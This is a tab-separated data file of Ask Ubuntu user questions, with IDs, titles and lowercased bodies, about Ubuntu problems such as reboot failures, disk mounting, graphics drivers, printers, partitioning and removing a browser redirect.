448431	ubuntu 13.10 reboot issue	have some problem with restart server supermicro on ubuntu server 13.10 . command : reboot shutdown -r now init 6 dont restart my server , but after it shutdown . i need to push power button every time . what i did to resolve this issue : first : append file /etc/modprobe.d/blacklist.conf by # make system reboot blacklist mei second : write at /etc/default/grub grub_cmdline_linux_dafault= '' acpi=force reboot=acpi '' or grub_cmdline_linux_dafault= '' acpi=force reboot=warm '' but it does n't help me . any suggestion ? p.s . tested other os on this hardware - rebooting ok. os : last debian , win8 , winxp .
448432	unknown item on unity desktop - is that a widget , can it be removed ?	edit solution : i found the responsible program . the indicator `` my-weather-indicator '' has a widget option . however , that widget does not function correctly and puts the below described pin/circle onto the desktop . maybe that works correctly , if the widget layer of unity is enabled . i got rid of the icons now by opening the preferences of the weather indicator and disabling the widget option . lately , after installing ubuntu 14.04 i found a strange item on my desktop . i was only able to see it since it had a layover effect on the white background of my browser . this item was a small ( about 50 pixels diameter ) circle . upon closing the browser it stayed on the desktop invisible , however hovering the mouse over it made it slightly visible . it could not be closed nor did it have a right click menu . eventually it changed to a pin which i clicked and it disappeared . edit : i found that it is always there and has a field assigned to it that turns black when i shutdown/logout . my guess is that it is some kind of widget . however , i do n't know where to turn it off and to my knowledge i have no widget enabled . i also found it when logging into xfce4-desktop . there it is easily visible and has a black box to it . right click does not reveal anything about it . does anyone have an idea what that was/is ? here is an image of the icon , when hovering the mouse over it :
448433	iptux does not start : `` address already in use '' error	i installed iptux , when i tried to open the application it shows the error fatal error ! ! failed to bind the tcp/udp port ( 2425 ) ! address already in use . please help me with the error
448436	ubuntu 12.04 how do i remove the guest option at login	my first question is , how do i remove the guest option at login so it is just me who uses the computer/ubuntu ?
448444	juju security model issues	what plans are there to extend the security model in juju ? we see two significant issues with the current model - no internal firewalling within an environment , and the inability to expose ports to systems outside the environment selectively . within an environment it appears that all machines can access any port on any other machine in that environment . for example , looking at the security groups in a juju environment deployed on aws , each instance launched by juju is in a juju- security group with all udp and tcp ports open to that security group . this means that if an attacker compromises any system in the environment they can probably go anywhere . also , the only way to expose ports outside of the environment is to expose them to any external system - there is no way , for example , to restrict access to a set of ip addresses . both ec2 and openstack support internal firewalling and selectively opening ports , and other orchestrators such as chef and puppet support these features , so it would be good if juju could as well .
448446	will there be armel images for 14.04 ?	looking at this page , it looks like armel arch will not be provided for 14.04 . i 'd that the case ? why so and when did this happen ? as a sidenote , i run armel 12.04 on my embedded systems , and have n't checked if armhf works .
448455	updating ubuntu 13.10 to 14.04	i 've updated my ubuntu to 14.04 lts before but now i installed ubuntu and partitioned my hard disk about 10 times , trying to do everything but it ca n't be updated to 14.04 lts again without saying something like `` partial update , errors in some packages '' ! the command is sudo do-release-upgrade -d i have a dual uefi processor 'intel g630 2.7ghz '
448460	boot repair problems ?	i have a windows 8 laptop ( compaq cq45 ) i uninstalled 8 . i installed ubuntu 13.10 on my laptop . but know i installed windows 7 . i cant get it on start-up to ask me what i would like to do . how can this problem be fixed .
448462	suspend to ram not working	it used to be working in xubuntu 13.04 , now i 'm using ubuntu studio 13.10 and it does n't switch off the fans . if i resume ( press any keys , also wake up key ) it goes back normally , but if i manually switch off then on the next power on there are crash notifications . i paste xset -q output pointer control : acceleration : 2/1 threshold : 4 screen saver : prefer blanking : yes allow exposures : yes timeout : 0 cycle : 0 colors : default colormap : 0x20 blackpixel : 0x0 whitepixel : 0xffffff font path : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins dpms ( energy star ) : standby : 7200 suspend : 7200 off : 14400 dpms is disabled
448464	ubuntu alternate graphic problem	i installed ubuntu alternate as myserver . i had graphical problems : i can only boot using recovery mode . even with recovery mode , the screen becomes black every few seconds . i installed a graphical drive like this : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get install xserver-xorg-video-ati installation was fine . but the problem is still there . the output of the problem is this : error : no video mode activated how can i fix it , please ?
448465	reliably remapping keys per input device	i have a mac , and the modifier keys on the keyboard are in order from left to right : ctrl , alt , super ( aka . cmd , â , windows-key ) . i 'd like the order to be ctrl , super , alt instead , and so i have proceeded to remap them . there 's a rub , tough , because i regularly attach an external keyboard which has the keys in the correct order already . if i swap the keys here , they end up wrong . so i want to remap/swap the keys for apple keyboards specifically . as a substitute for this , i 'd gladly accept remaping the keys for the specific keyboard stuck in my laptop only ( as opposed to all apple keyboards automatically ) . after researching this , i have ended up with a solution that is only half working . i am running the following script on login ( ~/.kde/autostart/custom-remap.sh ) , which attempts to remap the keys for my internal keyboard only : # ! /bin/bash -e dirname= $ ( dirname $ 0 ) # use xinput to target a specific keyboard only : apple_keyboard_id= $ ( xinput list | grep 'apple internal keyboard ' | sed -n 's/.*id=\ ( [ 0-9 ] \+\ ) . */\1/p' ) # apply mappings from xkb/symbols/custom # maps ctrl , win and alt-keys to be in pc standard positions setxkbmap -device $ apple_keyboard_id -print | sed 's/\ ( xkb_symbols . *\ ) '' /\1+custom ( apple-keyboard-swaps ) '' / ' | xkbcomp -i $ dirname/xkb -i $ apple_keyboard_id -synch - $ display this relies on the following file , xkb/symbols/custom : xkb_symbols `` apple-keyboard-swaps '' { key < lwin > { [ alt_l ] } ; key < lalt > { [ super_l ] } ; key < rwin > { [ alt_r ] } ; key < ralt > { [ control_r ] } ; } ; this solution sometimes works perfectly , sometimes has no effect and recently it seemed like a hybrid result took root in my system : neither of the alt or super keys would work properly , they seem to act a little bit as both . `` sometimes '' is really ill defined . i can get into either state after a reboot . attaching/detaching my external keyboard might trigger a state change . other times , seemingly at random , the state will switch while i 'm using the computer . running the script multiple times does not seem to affect the state ( if it does n't take the first time , it does n't take the n-th time either ) . how can i achieve the relevant remapping and have it working reliably ? ( i am currently running kubuntu 14.04 , but it acted similarly under kubuntu 13.10 )
448466	how to make a python script a command ?	i 'm trying to make a python script into a command , eg : google 's ipaddr.py ( http : //code.google.com/p/ipaddr-py/ ) . i want to be able to type ipaddr and it puts out what i want . is this possible ? i 've tried making it executable with chmod +x , then moving it to /bin and it still says : no command 'ipaddr ' found , did you mean : command 'ipmaddr ' from package 'net-tools ' ( main ) command 'ibaddr ' from package 'infiniband-diags ' ( universe ) ipaddr : command not found
448467	how to install important updates via update manager after a large gap of period ?	i am checking for updates from my update manager . it says last updated 135 days ago and takes 8 to 9 hrs to check for updates . finally one or more warnings : ca n't install updates from unauthorized sources . and everything vanishes . it is must to update for some packages like g++ . i also tried sudo apt-get update . takes same time with same errors .
448469	overwritten system files	i need help to work out what damage i have done to my ubuntu server . i ran a poorly coded script which has overwritten 26 files on my ubuntu server . the script used sudo to run with root permissions to copy files from my raspberry pi box . there is nothing noticeably wrong with the ubuntu server at the moment - it is operating fine currently in headless mode - but can anyone give my any advice as to what the files i have changed do and how i might put them back , if necessary ? i am especially worried about the files in the /boot directory . i worry that i may have left the ubuntu server unable to reboot . the files that were overwritten are : -rwxr-xr-x 1 root root 17824 apr 9 14:08 /boot/bootcode.bin -rwxr-xr-x 1 root root 142 feb 9 2013 /boot/cmdline.txt -rwxr-xr-x 1 root root 1191 may 19 2013 /boot/config.txt -rwxr-xr-x 1 root root 5783 apr 9 14:08 /boot/fixup.dat -rwxr-xr-x 1 root root 2068 apr 9 14:08 /boot/fixup_cd.dat -rwxr-xr-x 1 root root 8829 apr 9 14:08 /boot/fixup_x.dat -rwxr-xr-x 1 root root 3115216 apr 9 14:08 /boot/kernel.img -rwxr-xr-x 1 root root 9789752 apr 9 14:08 /boot/kernel_emergency.img -rwxr-xr-x 1 root root 2514136 apr 9 14:08 /boot/start.elf -rwxr-xr-x 1 root root 480216 apr 9 14:08 /boot/start_cd.elf -rwxr-xr-x 1 root root 3495816 apr 9 14:08 /boot/start_x.elf -rwxr-xr-x 1 root root 137 feb 9 2013 /boot/issue.txt -r -- r -- r -- 1 root root 0 apr 16 09:22 /dev/sndstat -rw-r -- r -- 1 root root 0 apr 9 12:17 /run/shm/.tmpfs -rwxr-xr-x 1 root root 53293 sep 9 2012 /dev/makedev -rwxr-xr-x 1 root root 53293 sep 9 2012 /sbin/makedev -rwxr-xr-x 1 root root 227868 jul 2 2012 /sbin/tc drwxr-xr-x 2 root root 4096 jan 18 19:19 /usr/lib/tc lrwxrwxrwx 1 root root 6 mar 30 2012 /sbin/swapoff - > swapon lrwxrwxrwx 1 root root 10 nov 20 2011 /sbin/lsmod - > /bin/lsmod -rwxr-xr-x 1 root root 75868 apr 29 2013 /bin/lsmod lrwxrwxrwx 1 root root 13 mar 7 2013 /sbin/ip6tables-save - > xtables-multi -rwxr-xr-x 1 root root 24488 jul 2 2012 /sbin/rtacct -rwxr-xr-x 1 root root 26176 aug 11 2012 /sbin/ntfslabel -rwxr-xr-x 1 root root 93148 dec 22 2012 /sbin/fdisk -rwxr-xr-x 1 root root 30332 dec 22 2012 /sbin/mkfs.cramfs as requested , here is a list of all the files that are now in /boot : -rw-r -- r -- 1 root root 178944 nov 27 2011 memtest86+_multiboot.bin -rw-r -- r -- 1 root root 176764 nov 27 2011 memtest86+.bin -rwxr-xr-x 1 root root 142 feb 9 2013 cmdline.txt -rwxr-xr-x 1 root root 137 feb 9 2013 issue.txt -rwxr-xr-x 1 root root 1191 may 19 2013 config.txt -rw -- -- -- - 1 root root 5453616 jan 30 17:47 vmlinuz-3.8.0-35-generic -rw -- -- -- - 1 root root 3192757 jan 30 17:47 system.map-3.8.0-35-generic -rw-r -- r -- 1 root root 154959 jan 30 17:47 config-3.8.0-35-generic -rw-r -- r -- 1 root root 919810 jan 30 17:47 abi-3.8.0-35-generic -rw -- -- -- - 1 root root 5454928 feb 3 22:19 vmlinuz-3.8.0-36-generic -rw -- -- -- - 1 root root 3192822 feb 3 22:19 system.map-3.8.0-36-generic -rw-r -- r -- 1 root root 154959 feb 3 22:19 config-3.8.0-36-generic -rw-r -- r -- 1 root root 919810 feb 3 22:19 abi-3.8.0-36-generic -rw-r -- r -- 1 root root 20324962 feb 16 07:02 initrd.img-3.8.0-35-generic -rw-r -- r -- 1 root root 20329365 feb 19 06:39 initrd.img-3.8.0-36-generic -rw -- -- -- - 1 root root 5458256 feb 19 21:52 vmlinuz-3.8.0-37-generic -rw -- -- -- - 1 root root 3194987 feb 19 21:52 system.map-3.8.0-37-generic -rw-r -- r -- 1 root root 154970 feb 19 21:52 config-3.8.0-37-generic -rw-r -- r -- 1 root root 920492 feb 19 21:52 abi-3.8.0-37-generic -rw -- -- -- - 1 root root 5457776 mar 13 16:46 vmlinuz-3.8.0-38-generic -rw -- -- -- - 1 root root 3195003 mar 13 16:46 system.map-3.8.0-38-generic -rw-r -- r -- 1 root root 154970 mar 13 16:46 config-3.8.0-38-generic -rw-r -- r -- 1 root root 920492 mar 13 16:46 abi-3.8.0-38-generic -rw-r -- r -- 1 root root 20328592 mar 25 06:44 initrd.img-3.8.0-37-generic drwxr-xr-x 23 root root 4096 apr 4 06:41 .. drwxr-xr-x 3 root root 12288 apr 4 06:42 grub -rw-r -- r -- 1 root root 20667791 apr 9 13:44 initrd.img-3.8.0-38-generic -rwxr-xr-x 1 root root 17824 apr 9 14:08 bootcode.bin -rwxr-xr-x 1 root root 5783 apr 9 14:08 fixup.dat -rwxr-xr-x 1 root root 2068 apr 9 14:08 fixup_cd.dat -rwxr-xr-x 1 root root 3115216 apr 9 14:08 kernel.img -rwxr-xr-x 1 root root 8829 apr 9 14:08 fixup_x.dat -rwxr-xr-x 1 root root 9789752 apr 9 14:08 kernel_emergency.img -rwxr-xr-x 1 root root 2514136 apr 9 14:08 start.elf -rwxr-xr-x 1 root root 480216 apr 9 14:08 start_cd.elf -rwxr-xr-x 1 root root 3495816 apr 9 14:08 start_x.elf drwxr-xr-x 3 root root 4096 apr 9 14:08 .
448472	qml : what is the difference between row and templaterow ?	templaterow is just an example out of several . there is also templatesection and i assume templatecolumn as well as many others . when should i be using row { } vs templaterow { } ?
448474	error when mounting local hdd : wrong fs type , bad option , bad superblock on /dev/sdb1	suddenly , when trying to access one of my local hdd , i get this error : error mounting /dev/sdb1 at /media/j/storage2 : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdb1 '' `` /media/j/storage2 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i am just a low-level ubuntu user .
448477	ensures that a fs is mounted on the given mount point	while i make some copy/paste from external into internal hard drives , some errors occurred and the device was unmounted and remounted again in a different folder . this lead to many problems as i supposed that copy/paste is done correctly ... so is there a solution to verify always that a harddrive will be mounted always at the same mount point ?
448482	can anyone tell me what the key shortcut is in ubuntu 14.04 to activate/use scale/expo ?	i am wondering if the keyshortcuts change in ubuntu 14.04 ... and wondering what they will be for scale and expo . any ideas ?
448486	not able to connect to tata photon plus on ubuntu 12.04.2	it seems recently there was some upgrade of tata photon plus and now we need to give dailer pin code '0000 ' to enable it before it can be used . due to this , i am not able to use tata photon plus on my system . the device gets detected , and it shows up as mobile broadband connection . but when i try to connect it , it tries to connect showing as `` not enabled '' and after trying for something it gets disconnected . i went through the solution given here but it doesnt help . tata photon plus can not establish connection after photon 's system upgrade
448488	black screen before login screen error	i got this black screen in ubuntu 13.10 after a message popped up `` would you run into a lower graphics '' . i clicked `` ok '' then after that when i reboot my ubuntu , after the ubuntu loading screen shows up the black screen appeared and it never shows the login screen . i tried this but it did n't work : sudo apt-get install bumblebee-nvidia sudo apt-get remove -- purge nvidia sudo reboot i 'm using an ati moility radeon hd 5000 series .
448492	accessing windows local repository from ubuntu local machine	we have a windows lan network with tortoise svn repository . now we added a new ubuntu local machine to our network . but we failed to access our windows svn repository from our new ubuntu local machine with rabbitvcs . any idea about how to access windows repository ( tortoise svn ) from rabbitsvn ? pls help ...
448496	restore read-only file from deja-dup	i have a backup of my web server files ( user=www-data ) created by my main ubuntu user ( not root ) that has read access to the web server file system . i am unable to restore files via the nautilus 'restore missing files ' shortcut because my main user does n't have wrote permission for the target folder . is there a way around this ? e.g . running the restore as root in some way ? note that the backup archive is associated with my main user and not root so simply opening nautilus as root is no use since the backup is n't associated with 'root ' . thanks
448497	source code formatter/indenter	i 'm using ubuntu 12.04 . i do not have any root or sudo privileges as this is a company machine . is there , in a normal installation of ubuntu 12.04 , any terminal program that i can use to turn ugly malformed source code that lacks any indentation into nice looking code ? again , i ca n't install any packages so i need one that already comes with ubuntu , if such a thing exists . for example : int main ( ) { test ( 1 ) ; another_function ( 1 ) ; } and then convert it to : int main ( ) { test ( 1 ) ; another_function ( 1 ) ; }
448513	privileges denied : trying to change setting of an application	i am a newbee , i 've installed wine-1.6.1 ( following , can wine support office 2007 ? ) . later i did install idm successfully , right clicking the .exe file and choosing `` open with wine windows program loader '' . while i was trying to change options of idm , it prompts you do not have administrative privileges or you did not allow idm helper program to execute as administrator ( is it because , i did not you sudo to install this application ) you pressed cancel button during idm network driver installation ( which i recall not doing it any way along the installation procedure ) you blocked idm network driver startup or installation by means of the thrid-party security software or antivirus so how do i get the administrative rights over this application without having to remove and reinstall using sudo . i have tried to find solution over the internet but in vain . all i could find is information on usage of sudo and root . i have also tried using chmod to change the wrx rights . i 'm using ubuntu 12.04 lts and wine-1.6.1
448515	lubuntu remembers secure wifi connection login credentials	at our school , students log on to their internet accounts as follows : student a logs on to the internet account by logging onto the school 's secure wifi connection with his login name and password . when student a is done , they sign out . when student b logs on , lubuntu remembers the student a 's login information for the wifi and student b can access the internet without typing their own login name and password . what can we do to make lubuntu to forget wifi connection login credentials ?
448518	how can i see in lubuntu what ram modules i have ?	i have the latest lubuntu installed on a laptop . how can i see how many ram modules i have installed , and what type of ram modules they are , without physically opening the laptop itself ? i can see how much ram i have in total , using the system profiler and benchmark utility , but i want to know how many modules i have and what type of modules they are . thanks samuel
448520	ubuntu 13.10 no longer boots , stuck at grub boot prompt ( sdb hdd that ubuntu 's installed on is no longer detected )	ubuntu 13.10 has been running fine since i installed it on my external harddrive a few weeks ago . however , yesterday while ubuntu was running , i accidentally knocked the external harddrive off the table and a cable ( power plugged into usb socket ) detached . portions of the screen went grey and the system froze . i had to turn the laptop off by holding down the power button . i plugged the cable back in and started up the laptop . however , instead of the usual option to boot ubuntu , i got the gnu grub2 boot prompt . i have actually had this happen a couple of times before , but after plugging everything back in , ubuntu would boot normally . this time , though , no such luck . i have booted from the cd i used to install ubuntu from and selected the option to try without installing . once there , i ran sudo fdisk -l from the terminal . here are the results : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 256 heads , 63 sectors/track , 60563 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbb8b9976 device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt as you can see above , my sdb external harddrive is not detected . disconnecting/reconnecting it seems to make no difference . any help would be greatly appreciated !
448521	mounted drives to show in devices	when i have an extra drive plugged into the computer , it shows in `` devices '' as shown here with the 250g filesystems : however , once added to /etc/fstab` for automatic mounting , it will no longer appears as a device and it is up to the user to know where all the drives are mounted if they do not want to use the root partition . example fstab line : uuid=9ea922e4-94ce-4ae0-90cf-65a4957051bd /mnt/extra_storage ext4 defaults 0 2 is there a way to register a drive as a device such that tools like duplicity will automatically show them in their menus etc ? perhaps i just need to mount somewhere other than /mnt ? image description : duplicity lists drives as places to store , but i have make sure to use `` local folder '' which makes it appear as if i am storing the backup on the drive i am backing up .
448524	what are translation entries ?	i was looking to speed up the sudo apt-get update then i found this blog which suggests to remove translation entries what exactly are translation entries ? why they exist in the first place ?
448535	how to run celtx without gksudo	i use the screenwriting software celtx on ubuntu 12.04 . it runs fine , except that i have to use the software regularly , and it asks me to enter the password every time i want to use it . i changed the permissions on /usr/local/celtx so that i could use it without gksudo . after that , the software opened without me having to enter the password , but my work would n't get saved . it gives me the following error message when i try to save it : celtx was unable to save your project : [ exception ... `` component returned failure code : 0x80520015 ( ns_error_file_access_denied ) [ nsizipwriter.open ] '' nsresult : `` 0x80520015 ( ns_error_file_access_denied ) '' location : `` js frame : : chrome : //celtx/content/save.js : : archiveceltxproject : : line 1568 '' data : no ] any idea about how to fix this ? lol yeah i changed that to my actual user name . this is what the file looks like - gnu nano 2.2.6 file : /etc/sudoers.tmp root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d # bhaskar all=nopasswd : /usr/local/celtx/celtx
448537	ca n't remove redirect malware on firefox	i researched and found : mypageresults.com is tabbed as a redirect virus that always slips into computer without user 's approval . i ca n't remove it.i deleted all files of firefox.i removed firefox and installed again , i did reset firefox.but still this problem is not solved.what should i do ? and it is my etc/hosts 127.0.0.1 localhost 127.0.1.1 schwappkopf # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters 127.0.0.1 productsearch.ubuntu.com
448541	is there a good reason to have separate /home and data partitions ?	i want to make the switch from w7/ubuntu dual boot to ( k ) ubuntu as my only os when 14.04 is released , but i 'm unsure about how to partition my hdd . the general consensus for a good desktop pc partition scheme seems to be around 15 -- 20 gb for / , 1.1*ram for swap and the rest for /home ( ... right ? ) . i will be working with some big data sets that i 'd like to keep separate from my system . for that reason i thought about keeping /home small and creating a fourth data partition where only work related stuff goes . a few questions about that : is there a good reason not to do that and instead keep all my data in /home ? i probably wo n't be jumping distros or something ; this is for my work pc and i will likely stay on a 14.04 lts for a long time . if it 's a good idea to have a separate data partition : how big should /home be if i do n't store any data there ? or should i not make it a separate partition at all then ? please tell me if this is a stupid idea . i just did n't find myself working in /home at all ( mostly on network or on a data partition that i shared with windows ) . but then again , / , swap , /home and / , swap , data does n't seem to be much different apart from the fact that i do n't have any linux configuration files floating around in my data backups . here is a somewhat related question , but they do n't go into detail whether or not this is a good idea anyway .
448545	ubuntu 12.04 on amilo la1703 after istalling graphics does n't start ?	the installation process pass normal , and after restarting the graphic does n't start . it appears message `` the system is running in low-graphics mode '' maybe is something connected with the chipset on the laptop via chrome9 hc igp . does someone know fix for this problem with via chips , or exact procedure to solve the problem . thanks in advance !
448551	close , maximize and minimize buttons stop working	this is a strange thing , but the buttons to close , maximize and minimize a program stop working ; they 're there but do n't function . this is after i have clicked into the program and begin using it . after that , the only thing i can click that will respond is the program itself . i ca n't drag , maximize , close and minimize it at all . i try alt+tab and it brings me to the desktop , and even there i ca n't click anything . i am running 13.10 and have little experience in ubuntu but have prior knowledge of many os 's .
448552	is it possible to maximize windows vertically in gnome 3 by double click on the top border ?	i would like to maximize windows vertically by double clicking on the horizontal boarder like in windows . is there a way to get this behavior in gnome shell ? thanks in advance edit : i forgot to mention that i mean double click . like in this video
448555	( re ) mount all network drives from fstab	from gentoo , i remember a separate /etc/init.d entry for mounting network drives ( i.e. , separate from local drives ) . in ubuntu , there is umountnfs.sh , which is used during shutdown ( in order to ensure clean unmounting while the network is still available ) , and which one can use to unmount all ( currently mounted ) network drives . however , i am missing a quick way for mounting all network drives from /etc/fstab that are not up yet , and/or remounting all network drives ( e.g. , if the credentials / rights of cifs mounts have been changed ) . i would prefer a maintained 3rd party solution over a one-line shell hack .
448561	customizing ubiquity	i would like to create changes to the ubiquity installer , like for example turning off the try ubuntu option and so on . i downloaded the source code and i am going through it but it is very hard to find a starting point since it uses several programming languages and depends on the debian installer ( d-i ) . are there any good sources or documentation that i could use to go and develop my own version of ubiquity ? the official ubuntu wiki does not give enough details to get you started . thanks .
448562	how do i get my lexmark z517 printer working ?	tried the following : i plug in the usb cable , then try to add it . it is seen as lexmark 510 ( 924426000000000 ) i am then asked to pick one of downloadable drivers , or postscript-lexmark , or local driver . i pick the 2nd one . i get a message it is installing openprinting-ppds-postscript-lexmark . then it wants me to again choose whether i want a printer from a db ( it lists tons of manufacturers ) , provide ppd file , or search for a printer driver to download . i dont know what to pick . in lexmark , there is a c510 , c510b but no 510 , 517 or z517 . under model 510 , there is postscript-lexmark 20140110 ( ope ... , lexmark c510 ( en ) , lexmark c510 foomatic/postscript ( en ) if i pick the 1st one , it asks me about options , so i select 1 tray , no duplex , no flash , no disk , 64m . then it offers to print a test page , which doesnt come out . no error . this sprinter works under m $ windows . fwiw , now running 14.10 , still no joy . help , anyone ? please ? looked on the lexmark site , they say they have nothing for this printer .
448565	ap-hotspot can not connect to android devices	i created a hotspot using ap-hotspot in my ubuntu 12.10 . the created hotspot shows in my android phone but it get stucks in obtaining ip address.. how can i add an ip address ?
448569	how can i remove gnome shell ( desktop environment ) but remain unity ?	i am current using ubuntu 13.10 dist and i 'm very happy to use unity than gnome shell . now i would like to remove gnome shell completely and install cinnamon desktop ( i just want unity and cinammon in my selection ) into ubuntu dist . what is the safety way to do that ?
448571	ubuntu 12.04 lts no network manager after installing	i have downloaded ubuntu 12.04 lts for the first time and can not get connection to the internet as the network manager has not been installed . ( 32 bit laptop ) i have tried several options including reinstalling ubuntu , following instructions via enabling/disabling network manager and also installing . i have carefully followed the instructions and tapped them into the terminal but have only received further complications . i now feel like a halfwit trying to fix an f111 fighter with a screwdriver and an oily rag . it is not a great intro to ubuntu for a beginner when the rest of the desktop looks so good . many people must be trying to abandon windows xp and this is the perfect opportunity for linux to proliferate . has anybody got a simple and foolproof way of solving the problem ? regards peterarch
448572	installed libopencv results in blackscreen after login	i am new to ubuntu and set it up a few days ago . now i wanted to install opencv since i need this for university matters . after turning off my pc i was able to log in but afterwards just a black screen appeared . the mouse is able to move and also the terminal can be called with ctrl+alt+t . i read in some forums that the libopencv may crashs with my amd graphic card . but i do not not know how i solve this problem . i removed the nvidia-319 driver but it says there is nothing installed . so i donâ´t know what the problem is . i hope someone could help me .
448575	apt-get crashes with : relocation error : libapt-pkg.so.4.12	after running a simple upgrade i get a crash each time i try to use apt-get . any command crashes with the same error message : legaliz_me : ~ $ sudo apt-get apt-get : relocation error : /usr/lib/x86_64-linux-gnu/libapt-pkg.so.4.12 : symbol dddddddddddddddddddddddddddddffffffffffffffffffffffffffffffffffffff_znst6vectorin3apt13configuration10compressoresais2_ee13_m_insert_auxen9__gnu_cxx17__normal_iteratorips2_s4_eerks2_ , version glibcxx_3.4 not defined in file libstdc++.so.6 with link time reference full log : http : //pastebin.com/bmte5erz i do n't remember adding any crazy edger ppa or anything special with my system . i 'm running 14.04 64bits . is apt broken for any other person ?
448582	bumblebee and lenovo ideapad z580 with nvidia geforce gt 630m	bumblebee does n't recognizes my graphic card , $ lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 630m ] ( rev a1 ) i have tried installing bumblebee with the nouveau driver : sudo apt-get install bumblebee primus and with the nvidia driver , but i have always the same error : sudo apt-get install bumblebee-nvidia primus i have also installed the linux-headers : sudo apt-get install linux-headers- $ ( uname -r ) and fore the acpi mode in the grub , but the error still : $ optirun blender [ 769.988591 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 769.988627 ] [ error ] aborting because fallback start is disabled . $ optirun -vv blender [ 806.686792 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 806.687551 ] [ debug ] optirun version 3.2.1 starting ... [ 806.687576 ] [ debug ] active configuration : [ 806.687585 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 806.687593 ] [ debug ] x display : :8 [ 806.687600 ] [ debug ] ld_library_path : /usr/lib/nvidia-304 : /usr/lib32/nvidia-304 [ 806.687608 ] [ debug ] socket path : /var/run/bumblebee.socket [ 806.687616 ] [ debug ] accel/display bridge : auto [ 806.687623 ] [ debug ] vgl compression : proxy [ 806.687631 ] [ debug ] vglrun extra options : [ 806.687638 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 806.687698 ] [ debug ] using auto-detected bridge virtualgl [ 806.718838 ] [ info ] response : no - error : [ xorg ] ( ee ) no devices detected . [ 806.718871 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 806.718883 ] [ debug ] socket closed . [ 806.718912 ] [ error ] aborting because fallback start is disabled . [ 806.718922 ] [ debug ] killing all remaining processes . what can i do ?
448583	no battery status icon on lenovo b570e	i am using lenovo b570e with ubuntu 13.10 and my desktop wo n't display the battery status icon . i have already tried to add the icon in the system settings , but that has not worked .
448584	root directory almost full but still lots of free space on the partition	some time ago i installed 12.04 from windows xp on a separate `` linux '' partition via wubi . this partition was allocated 50 gb . my problem now is that obviously the root directory does not have access to the entire volume but only to about 10 gigs which is now not very far from being exhausted . when i call partition monitor i get this : the hard drive is divided into 3 partitions altogether : the windows volume ( sda1 ) with 146 gigs , a `` save '' volume ( sda6 ) for backups and stuff with some 103 gigs and the linux volume ( sda5 ) with about 50 gigs of space however being host of this strange subdivision `` loop0 '' where the root directory seems to be placed ( so this 10 gigs of the loop0 division seem to belong to the sda5 partition , at least thats what i get ) my question is : how can i make the ubuntu root directory to have access to the full 50 gigs of the partition instead of being restricted to the loop0 subdivision to give you some more info heres what the df and mount comments tell me : knabbits @ ubuntu : ~ $ df -h df : `/root/.gvfs ' : permission denied filesystem size used avail use % mounted on /dev/loop0 11g 7.5g 2.3g 78 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 400m 1004k 399m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 492k 2.0g 1 % /run/shm /dev/sda5 49g 12g 38g 24 % /host /dev/sda1 147g 116g 32g 79 % /media/windows /dev/sda6 103g 86g 18g 84 % /media/save knabbits @ ubuntu : ~ $ mount /dev/loop0 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda5 on /host type fuseblk ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 ) /dev/sda1 on /media/windows type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda6 on /media/save type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/knabbits/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=knabbits ) gvfs-fuse-daemon on /root/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev ) as you can notice i yet dont know much bout linux file structure but still thats the issues that make you want to understand it .
448586	deleted ca certificates in firefox	i was very silly and deleted all my default ca certificates in firefox . ( i 'm using ubuntu ) . how do i get them all back ?
